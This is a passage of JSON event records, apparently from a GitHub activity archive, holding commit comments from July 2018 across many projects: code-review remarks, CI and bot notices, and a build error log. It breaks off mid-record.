{"id":"7937125212","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640460,"position":null,"line":null,"path":null,"commit_id":"0e46f27874ac177931b858f0ca58e9bda7cdbad9","created_at":"2018-07-09T11:50:12Z","updated_at":"2018-07-09T11:50:12Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=393)"}},"created_at":"2018-07-09T11:50:12Z"}
{"id":"7937125301","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640461,"position":null,"line":null,"path":null,"commit_id":"0e46f27874ac177931b858f0ca58e9bda7cdbad9","created_at":"2018-07-09T11:50:13Z","updated_at":"2018-07-09T11:50:13Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T11:50:13Z"}
{"id":"7937125702","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640464,"position":44,"line":43,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:50:18Z","updated_at":"2018-07-09T11:50:18Z","author_association":"OWNER","body":"Je cherche une date existante dans l'array qui a été trier précédemment. "}},"created_at":"2018-07-09T11:50:18Z"}
{"id":"7937126196","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/joommfutil-feedstock"},"payload":{"comment":{"id":29640465,"position":null,"line":null,"path":null,"commit_id":"57b82930901bf3291c62c806cab99ff2429120a1","created_at":"2018-07-09T11:50:24Z","updated_at":"2018-07-09T11:50:24Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T11:50:24Z"}
{"id":"7937129880","type":"CommitCommentEvent","actor":{"login":"WaKeMaTTa"},"repo":{"name":"i4a/meaning-cloud"},"payload":{"comment":{"id":29640476,"position":2,"line":2,"path":"spec/spec_helper.rb","commit_id":"ad7a791589a307399082130ef642f18df1f7ed5f","created_at":"2018-07-09T11:51:14Z","updated_at":"2018-07-09T11:51:14Z","author_association":"MEMBER","body":"Warp this in `if ENV['CI']`"}},"created_at":"2018-07-09T11:51:14Z"}
{"id":"7937135346","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640487,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:52:28Z","updated_at":"2018-07-09T11:52:28Z","author_association":"OWNER","body":"Wait, you just say so. I've found my stupid derp\r\nI should've placed these 2 `free`s after invoking libril request LMFAO\r\n\r\ngedit killed my eyes...."}},"created_at":"2018-07-09T11:52:28Z"}
{"id":"7937136678","type":"CommitCommentEvent","actor":{"login":"rhafer"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29640492,"position":57,"line":57,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-09T11:52:46Z","updated_at":"2018-07-09T11:52:46Z","author_association":"OWNER","body":"This part needs of course some adjustment for https://github.com/crowbar/crowbar-openstack/pull/1691"}},"created_at":"2018-07-09T11:52:46Z"}
{"id":"7937140827","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640503,"position":55,"line":54,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:53:42Z","updated_at":"2018-07-09T11:53:42Z","author_association":"OWNER","body":"ici j'ai préféré rajouter les `/` pour bien différencier les heures de disponibilités. \r\nOn obtient un hash de ce type : "}},"created_at":"2018-07-09T11:53:42Z"}
{"id":"7937144392","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"typesupply/defcon"},"payload":{"comment":{"id":29640508,"position":null,"line":null,"path":null,"commit_id":"bce898c1c2e6b24c4774fe9ca6f7a9f5b80ed6a0","created_at":"2018-07-09T11:54:27Z","updated_at":"2018-07-09T11:54:27Z","author_association":"COLLABORATOR","body":"@justvanrossum what would you recommend to do here instead?"}},"created_at":"2018-07-09T11:54:27Z"}
{"id":"7937145303","type":"CommitCommentEvent","actor":{"login":"haydnba"},"repo":{"name":"foundersandcoders/international-research"},"payload":{"comment":{"id":29640509,"position":null,"line":null,"path":null,"commit_id":"edbbbba179248d6d016472bf946fa680bab74ae2","created_at":"2018-07-09T11:54:37Z","updated_at":"2018-07-09T11:54:37Z","author_association":"COLLABORATOR","body":"Excellent, thanks arrested-developer!"}},"created_at":"2018-07-09T11:54:37Z"}
{"id":"7937147971","type":"CommitCommentEvent","actor":{"login":"JoaquimLey"},"repo":{"name":"JoaquimLey/transport-eta"},"payload":{"comment":{"id":29640521,"position":10,"line":17,"path":"transport-eta-android/mobile-ui/src/main/java/com/joaquimley/transporteta/ui/di/module/ActivityBindingModule.kt","commit_id":"a3508fb9601a01f9cf7a931c5d24d72599680da8","created_at":"2018-07-09T11:55:10Z","updated_at":"2018-07-09T11:55:10Z","author_association":"OWNER","body":"I'm not currently adhering to any specific code style, but this was a very good catch hehe thanks @ashishkrishnan.\r\n\r\nMy idea is when I do decide on a standard I get it into codestyle (plugin) and run through the whole project to format it and makes all those changes on a single commit :)."}},"created_at":"2018-07-09T11:55:10Z"}
{"id":"7937148988","type":"CommitCommentEvent","actor":{"login":"speleo3"},"repo":{"name":"Pymol-Scripts/Pymol-script-repo"},"payload":{"comment":{"id":29640525,"position":null,"line":null,"path":null,"commit_id":"21077e719b894ef90b284b92e36ccc44b68d95b4","created_at":"2018-07-09T11:55:24Z","updated_at":"2018-07-09T11:55:24Z","author_association":"CONTRIBUTOR","body":"You are right @sbliven. Feel free to reopen #70. A proper fix would require better understanding what the plugin is actually doing and why it needs `retain_order`. Setting `retain_order` per object instead of global would be the way to go then."}},"created_at":"2018-07-09T11:55:24Z"}
{"id":"7937157131","type":"CommitCommentEvent","actor":{"login":"lijingjie"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29640536,"position":null,"line":null,"path":null,"commit_id":"0766bb303ad8009c6061206f3aafe231c4f1c3ff","created_at":"2018-07-09T11:57:12Z","updated_at":"2018-07-09T11:57:12Z","author_association":"NONE","body":"Thanks for your reply.\r\n\r\n> What happens if you edit tee_input.rb and change TRANSFER_ENCODING = \"TRANSFER_ENCODING\".freeze to TRANSFER_ENCODING = \"HTTP_TRANSFER_ENCODING\".freeze?\r\n\r\nI can put file with transfer-encoder:chunked header by http request when passengerbufferupload is off.\r\n🌟I edit lib/phusion_passenger/request_handler/thread_handler.rb, too.\r\n\r\nif i don't changed the source, error will happen.\r\napache error log: \r\nApp 22178 stderr: [ 2018-06-13 10:17:35.9345 22203/0x0055710edcfa58(Worker 1) request_handler/thread_handler.rb:219 ]: *** Passenger RequestHandler warning: HTTP header size exceeded maximum."}},"created_at":"2018-07-09T11:57:12Z"}
{"id":"7937159195","type":"CommitCommentEvent","actor":{"login":"shannonkar"},"repo":{"name":"shannonkar/shannonkar.github.io"},"payload":{"comment":{"id":29640548,"position":null,"line":null,"path":null,"commit_id":"f978f94b8040c690f981af39e1fdfc74bd73d58d","created_at":"2018-07-09T11:57:40Z","updated_at":"2018-07-09T11:57:40Z","author_association":"OWNER","body":"Tells Jekyll some basics about the project"}},"created_at":"2018-07-09T11:57:40Z"}
{"id":"7937159631","type":"CommitCommentEvent","actor":{"login":"Chitradip-Capitalnumbers"},"repo":{"name":"Masterworks/Clarity-Components"},"payload":{"comment":{"id":29640552,"position":5,"line":94,"path":"clarity-html/sass/base/_layout.scss","commit_id":"17b85bffa44d7e44a7bcbceee9e1e68cca49560e","created_at":"2018-07-09T11:57:46Z","updated_at":"2018-07-09T11:57:46Z","author_association":"COLLABORATOR","body":"@danielgolden I have modified the class for edit-project page, remove the fixed width and margin, and place it inside a container with the class name \"col_12 col_offset_2\" thats make the section center. "}},"created_at":"2018-07-09T11:57:46Z"}
{"id":"7937166782","type":"CommitCommentEvent","actor":{"login":"shannonkar"},"repo":{"name":"shannonkar/shannonkar.github.io"},"payload":{"comment":{"id":29640565,"position":null,"line":null,"path":null,"commit_id":"150d310d21d9205f7141bde595dd0015e0fb72ba","created_at":"2018-07-09T11:59:17Z","updated_at":"2018-07-09T11:59:17Z","author_association":"OWNER","body":"The file tells Git to ignore the _site directory that Jekyll automatically generates each time  you commit"}},"created_at":"2018-07-09T11:59:17Z"}
{"id":"7937179084","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/VeloProjectTest1"},"payload":{"comment":{"id":29640597,"position":null,"line":null,"path":null,"commit_id":"3c0065736d7d1e56a5379e2e7771b7182ff7efe5","created_at":"2018-07-09T12:01:45Z","updated_at":"2018-07-09T12:01:45Z","author_association":"OWNER","body":"q"}},"created_at":"2018-07-09T12:01:45Z"}
{"id":"7937179936","type":"CommitCommentEvent","actor":{"login":"michaloo"},"repo":{"name":"hull/hull-node"},"payload":{"comment":{"id":29640606,"position":null,"line":null,"path":null,"commit_id":"4855d0a8920bcd36bf7f67e0d626906bb1aeee04","created_at":"2018-07-09T12:01:56Z","updated_at":"2018-07-09T12:01:56Z","author_association":"COLLABORATOR","body":"Yes, it is part of breaking 0.14 release."}},"created_at":"2018-07-09T12:01:56Z"}
{"id":"7937180896","type":"CommitCommentEvent","actor":{"login":"felix-centenera"},"repo":{"name":"felix-centenera/haexample"},"payload":{"comment":{"id":29640608,"position":null,"line":null,"path":null,"commit_id":"df828752cc496eec4da869572b3eb8456f347bfd","created_at":"2018-07-09T12:02:09Z","updated_at":"2018-07-09T12:02:09Z","author_association":"OWNER","body":"rollback"}},"created_at":"2018-07-09T12:02:09Z"}
{"id":"7937182206","type":"CommitCommentEvent","actor":{"login":"fscoto"},"repo":{"name":"LoupVaillant/Monocypher"},"payload":{"comment":{"id":29640612,"position":null,"line":null,"path":null,"commit_id":"79f8285ea6cae0db2e906bf3eb65c8fcadabdaf8","created_at":"2018-07-09T12:02:25Z","updated_at":"2018-07-09T12:02:25Z","author_association":"NONE","body":"You can always expect that some exotic implementation will get *something* wrong, like a subtle bug in memcmp, broken malloc, etc. If you target C99, you should in my opinion assume that C99 works. If it helps, free() has had this behavior since at least C89."}},"created_at":"2018-07-09T12:02:25Z"}
{"id":"7937183416","type":"CommitCommentEvent","actor":{"login":"nizardrou"},"repo":{"name":"biosails/pheniqs"},"payload":{"comment":{"id":29640616,"position":null,"line":null,"path":null,"commit_id":"290dd7fd9490c886e3eaba45af91e63fa5fd2c28","created_at":"2018-07-09T12:02:41Z","updated_at":"2018-07-09T12:02:41Z","author_association":"NONE","body":"How do I build pheniqs locally?"}},"created_at":"2018-07-09T12:02:41Z"}
{"id":"7937184092","type":"CommitCommentEvent","actor":{"login":"sshine"},"repo":{"name":"Athas/EggsML"},"payload":{"comment":{"id":29640618,"position":null,"line":null,"path":null,"commit_id":"503b0610bae4051da83fec5b24ddfa39cdb347e3","created_at":"2018-07-09T12:02:50Z","updated_at":"2018-07-09T12:02:50Z","author_association":"COLLABORATOR","body":"Hjælper ikke, da advarslerne oprinder fra HTML::Query-modulet og ikke her."}},"created_at":"2018-07-09T12:02:50Z"}
{"id":"7937186778","type":"CommitCommentEvent","actor":{"login":"Tsyrkun"},"repo":{"name":"Tsyrkun/JavaScript-Basics"},"payload":{"comment":{"id":29640623,"position":null,"line":null,"path":null,"commit_id":"e25c6ec2d966f0492cd71f2e9bc2a75959045548","created_at":"2018-07-09T12:03:27Z","updated_at":"2018-07-09T12:03:27Z","author_association":"OWNER","body":"Functions:\r\nAdd to Doubly linked list\r\nRemove from Doubly linked list\r\nRemove All from Doubly linked list\r\n\r\nEvent emitter implemented"}},"created_at":"2018-07-09T12:03:27Z"}
{"id":"7937190390","type":"CommitCommentEvent","actor":{"login":"cmlili"},"repo":{"name":"derbedhruv/fpm"},"payload":{"comment":{"id":29640635,"position":null,"line":null,"path":null,"commit_id":"0d78cc146db8aeab6bc8f7ab3cc77015a2d990da","created_at":"2018-07-09T12:04:17Z","updated_at":"2018-07-09T12:04:17Z","author_association":"NONE","body":"why the radius of pupil is 224 not 112 ?"}},"created_at":"2018-07-09T12:04:17Z"}
{"id":"7937199719","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29640657,"position":null,"line":null,"path":null,"commit_id":"6a219c3fc492307a293175d38cf1554d60c52b7c","created_at":"2018-07-09T12:06:25Z","updated_at":"2018-07-09T12:06:25Z","author_association":"MEMBER","body":"@DNx5 @ljacqu bump"}},"created_at":"2018-07-09T12:06:25Z"}
{"id":"7937202830","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29640661,"position":null,"line":null,"path":null,"commit_id":"4de213a08af275f7ce0b809c2bb7508519e27552","created_at":"2018-07-09T12:07:07Z","updated_at":"2018-07-09T12:07:07Z","author_association":"COLLABORATOR","body":"Исключенный из `text_prepare.py`участок работал неудовлетворительно. Попробую переделать.\r\nВообще слишком много неупорядоченных шаблонов - надо как-то структурировать."}},"created_at":"2018-07-09T12:07:07Z"}
{"id":"7937208644","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29640672,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-09T12:08:22Z","updated_at":"2018-07-09T12:08:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T12:08:22Z"}
{"id":"7937209580","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/Lifetime-PMMP"},"payload":{"comment":{"id":29640675,"position":null,"line":null,"path":null,"commit_id":"18d031b46d3d261fb1bcb984e189f6c6963785f0","created_at":"2018-07-09T12:08:35Z","updated_at":"2018-07-09T12:08:35Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, and the build was created with the following warnings:\n\n1. Project already renamed, you may delete the projectId line from .poggit.yml now\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T12:08:35Z"}
{"id":"7937212111","type":"CommitCommentEvent","actor":{"login":"Lyeuiechang"},"repo":{"name":"ms0701515/NTHUCS-Project"},"payload":{"comment":{"id":29640685,"position":null,"line":null,"path":null,"commit_id":"2c4322c66ef55b2205d42b3f85756b1bfdc31e28","created_at":"2018-07-09T12:09:09Z","updated_at":"2018-07-09T12:09:09Z","author_association":"COLLABORATOR","body":"b1 b2 ???? :("}},"created_at":"2018-07-09T12:09:09Z"}
{"id":"7937212280","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29640686,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T12:09:11Z","updated_at":"2018-07-09T12:09:11Z","author_association":"NONE","body":"I have restarted the worker with 192 threads. And if it gets worse over time, maybe it is caused by memory fragmentation?"}},"created_at":"2018-07-09T12:09:11Z"}
{"id":"7937216373","type":"CommitCommentEvent","actor":{"login":"Nastya-Kruglikova"},"repo":{"name":"Nastya-Kruglikova/cool_tasks"},"payload":{"comment":{"id":29640695,"position":97,"line":106,"path":"src/models/flights.go","commit_id":"49a71624620b5d92ce9d55c424224f8a0f7891d4","created_at":"2018-07-09T12:10:05Z","updated_at":"2018-07-09T12:10:05Z","author_association":"OWNER","body":"var m Flights \r\n\r\nMaybe \r\n\r\nvar f Flights"}},"created_at":"2018-07-09T12:10:05Z"}
{"id":"7937218040","type":"CommitCommentEvent","actor":{"login":"WQPG"},"repo":{"name":"EnterpriseDB/zheap"},"payload":{"comment":{"id":29640698,"position":null,"line":null,"path":null,"commit_id":"b80e618a7df90013fb7a47c7055103a3ff462d8b","created_at":"2018-07-09T12:10:24Z","updated_at":"2018-07-09T12:10:24Z","author_association":"NONE","body":"make -j 6 world\r\nbut ,have some  mistakes\r\nmake[2]: 离开目录“/home/postgres/zheap-master/build/contrib/sepgsql”\r\nmake[1]: 离开目录“/home/postgres/zheap-master/build/contrib”\r\nhttp://www.oasis-open.org/docbook/xml/4.2/dbcentx.mod:383: parser error : Comment must not contain '--' (double-hyphen)\r\n<!-- End of DocBook character entity sets module V4.2 ..................... -->\r\n    ^\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:119: validity error : All markup of the conditional section is not in the same entity\r\n]]>\r\n^\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:127: validity error : PEReference: %dbpool.module; not found\r\n<![ %dbpool.module; [\r\n                   ^\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:127: parser error : conditional section INCLUDE or IGNORE keyword expected\r\n<![ %dbpool.module; [\r\n                    ^\r\nmake[3]: *** [html-stamp] 错误 1\r\nmake[3]: *** 正在等待未完成的任务....\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: '%' forbidden except for entities references\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : EntityValue: \" or ' expected\r\nhttp://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd:166: parser error : xmlParseEntityDecl: entity admon.mix not terminated\r\nmake[3]: *** [man-stamp] 错误 1\r\nmake[3]: 离开目录“/home/postgres/zheap-master/build/doc/src/sgml”\r\nmake[2]: *** [all] 错误 2\r\nmake[2]: 离开目录“/home/postgres/zheap-master/build/doc/src”\r\nmake[1]: *** [all] 错误 2\r\nmake[1]: 离开目录“/home/postgres/zheap-master/build/doc”\r\nmake: *** [world-doc-recurse] 错误 2\r\n"}},"created_at":"2018-07-09T12:10:24Z"}
{"id":"7937218395","type":"CommitCommentEvent","actor":{"login":"Saiyato"},"repo":{"name":"Saiyato/volumio-hd44780-plugin"},"payload":{"comment":{"id":29640703,"position":null,"line":null,"path":null,"commit_id":"1061f8109b20d2665de837093ddcd4af44060e7d","created_at":"2018-07-09T12:10:29Z","updated_at":"2018-07-09T12:10:29Z","author_association":"OWNER","body":"This fixes #5"}},"created_at":"2018-07-09T12:10:29Z"}
{"id":"7937219008","type":"CommitCommentEvent","actor":{"login":"Nastya-Kruglikova"},"repo":{"name":"Nastya-Kruglikova/cool_tasks"},"payload":{"comment":{"id":29640704,"position":17,"line":17,"path":"src/models/flights.go","commit_id":"49a71624620b5d92ce9d55c424224f8a0f7891d4","created_at":"2018-07-09T12:10:37Z","updated_at":"2018-07-09T12:10:37Z","author_association":"OWNER","body":"Maybe Flight"}},"created_at":"2018-07-09T12:10:37Z"}
{"id":"7937223208","type":"CommitCommentEvent","actor":{"login":"suda"},"repo":{"name":"particle-iot/lightship"},"payload":{"comment":{"id":29640714,"position":null,"line":null,"path":null,"commit_id":"480ee7faf096043421720b1755ae19bb681e3115","created_at":"2018-07-09T12:11:32Z","updated_at":"2018-07-09T12:11:32Z","author_association":"MEMBER","body":"Hi @gajus! We're running Node 6 and the `roarr` npm package seemed to use some newer JS syntax causing Lightship to crash. We needed a quick fix so we forked it and removed the logger for now."}},"created_at":"2018-07-09T12:11:32Z"}
{"id":"7937243783","type":"CommitCommentEvent","actor":{"login":"davidcoutadeur"},"repo":{"name":"ltb-project/ppm"},"payload":{"comment":{"id":29640767,"position":null,"line":null,"path":null,"commit_id":"44165ed5a04decc7cb4fecc374065c760eceaeff","created_at":"2018-07-09T12:15:55Z","updated_at":"2018-07-09T12:15:55Z","author_association":"COLLABORATOR","body":"Ok, this is not necessarily a priority.\r\nMaybe these points can be secured:\r\n- the RDN is considered as a regex, so if there are some characters like \".*\", it will be interpreted as such... For example, uid=.* will have a password always rejected, because .* is found in every password.\r\n- there is no particular check that strtok has found anything.\r\n\r\nI will give a look on this."}},"created_at":"2018-07-09T12:15:55Z"}
{"id":"7937244417","type":"CommitCommentEvent","actor":{"login":"alexBraidwood"},"repo":{"name":"dotnet/core"},"payload":{"comment":{"id":29640771,"position":11,"line":16,"path":"microsoft-support.md","commit_id":"e5d2093e3859f93a5b7697a0395c2cfc2f0df2b9","created_at":"2018-07-09T12:16:03Z","updated_at":"2018-07-09T12:16:03Z","author_association":"NONE","body":"Should the `End of Support` for Core 2.0 be in 2020 instead of 2018?"}},"created_at":"2018-07-09T12:16:03Z"}
{"id":"7937245627","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29640775,"position":null,"line":null,"path":null,"commit_id":"ac5f1532741a2877e38735d9a5cb6151e95bff0b","created_at":"2018-07-09T12:16:19Z","updated_at":"2018-07-09T12:16:19Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Formulário de fale conosco funcionando](https://trello.com/c/uwWD7neG/213-formul%C3%A1rio-de-fale-conosco-funcionando)"}},"created_at":"2018-07-09T12:16:19Z"}
{"id":"7937245996","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29640777,"position":null,"line":null,"path":null,"commit_id":"b016c45f4090acadbf98732ae3695915fdf684a2","created_at":"2018-07-09T12:16:23Z","updated_at":"2018-07-09T12:16:23Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Formulário de fale conosco funcionando](https://trello.com/c/uwWD7neG/213-formul%C3%A1rio-de-fale-conosco-funcionando)"}},"created_at":"2018-07-09T12:16:23Z"}
{"id":"7937246713","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29640782,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T12:16:33Z","updated_at":"2018-07-09T12:16:33Z","author_association":"NONE","body":"@vondele Your skipping scheme breaks the half-density principle in vertical direction.\r\ne.g. w/ 3 threads odd rootDepth's only get searched by the main thread, while on even ones all 3 search them.\r\nThis is not optimal on determinate configurations with low number of threads, see this [test](http://tests.stockfishchess.org/tests/view/5b43225e0ebc5902b90029fd)."}},"created_at":"2018-07-09T12:16:33Z"}
{"id":"7937248061","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29640787,"position":8,"line":12,"path":".travis.yml","commit_id":"338e0d10a35543f6f73dfbe9010157d1edcc135f","created_at":"2018-07-09T12:16:51Z","updated_at":"2018-07-09T12:16:51Z","author_association":"MEMBER","body":"I know. but Travis doesn't support bionic natively. So this is a Trusty VM that uses a debootstrap'ed bionic distribution"}},"created_at":"2018-07-09T12:16:51Z"}
{"id":"7937248657","type":"CommitCommentEvent","actor":{"login":"richsalz"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29640790,"position":null,"line":null,"path":null,"commit_id":"973abf52304b454e8f2220a11aa8b6c6512c44fb","created_at":"2018-07-09T12:16:58Z","updated_at":"2018-07-09T12:16:58Z","author_association":"CONTRIBUTOR","body":"You can't short-circuit, so you have to nest the ifdef GNUC test.  Ping @levitte "}},"created_at":"2018-07-09T12:16:58Z"}
{"id":"7937248663","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29640791,"position":null,"line":null,"path":null,"commit_id":"b2edc218880047503602cf4119c9a239d478947f","created_at":"2018-07-09T12:16:59Z","updated_at":"2018-07-09T12:16:59Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node && pdd -v -f /tmp/20180709-10128-lqca7 [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node && pdd -v -f /tmp/20180709-10128-lqca7 [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node\n+ pdd -v -f /tmp/20180709-10128-lqca7\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node\n33 file(s) found, 56 excluded\n/tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node/test/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node/test/node/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node/node/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180709-4-ayruvy/DronMDF/zold-lazy-node/zln/__init__.py is a binary file (0 bytes)\nReading test/node/test_front_get_root.py...\nReading test/node/test_put_score.py...\nReading test/node/score.py...\nPuzzle 51-784537fb 0/DEV at test/node/score.py\nReading test/zold/test_time.py...\nReading test/zold/test_score.py...\nPuzzle 50-ee4c6308 0/DEV at test/zold/test_score.py\nReading ansible/roles/gunicorn/files/gunicorn.socket...\nReading ansible/roles/gunicorn/files/gunicorn.conf...\nReading ansible/roles/gunicorn/templates/gunicorn.service.j2...\nReading ansible/roles/gunicorn/tasks/main.yml...\nReading ansible/roles/base/tasks/main.yml...\nReading ansible/roles/nginx/templates/nginx.j2...\nReading ansible/roles/nginx/tasks/main.yml...\nReading ansible/roles/zold/tasks/main.yml...\nPuzzle 16-1ba73fe5 0/DEV at ansible/roles/zold/tasks/main.yml\nPuzzle 16-4ea6dcd8 0/DEV at ansible/roles/zold/tasks/main.yml\nReading ansible/deploy.yml...\nReading check.sh...\nPuzzle 12-991eb218 0/DEV at check.sh\nPuzzle 9-b47b0f3b 0/DEV at check.sh\nPuzzle 1-01c7a030 0/DEV at check.sh\nReading .gitignore...\nReading .pylintrc...\nReading requirements.txt...\nReading LICENSE...\nReading .circleci/config.yml...\nReading .github/CODEOWNERS...\nReading README.md...\nReading node/config.py...\nReading node/app.py...\nPuzzle 3-c5db1bb8 0/DEV at node/app.py\nPuzzle 4-8fe4d4f8 0/DEV at node/app.py\nPuzzle 6-71010d54 0/DEV at node/app.py\nPuzzle 7-2bf15792 0/DEV at node/app.py\nReading node/db.py...\nReading node/score.py...\nPuzzle 51-a5ec3281 0/DEV at node/score.py\nPuzzle 51-d4183988 0/DEV at node/score.py\nPuzzle 51-da159903 0/DEV at node/score.py\nReading zln/zln.py...\nERROR: zln/zln.py; puzzle at line #23; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of 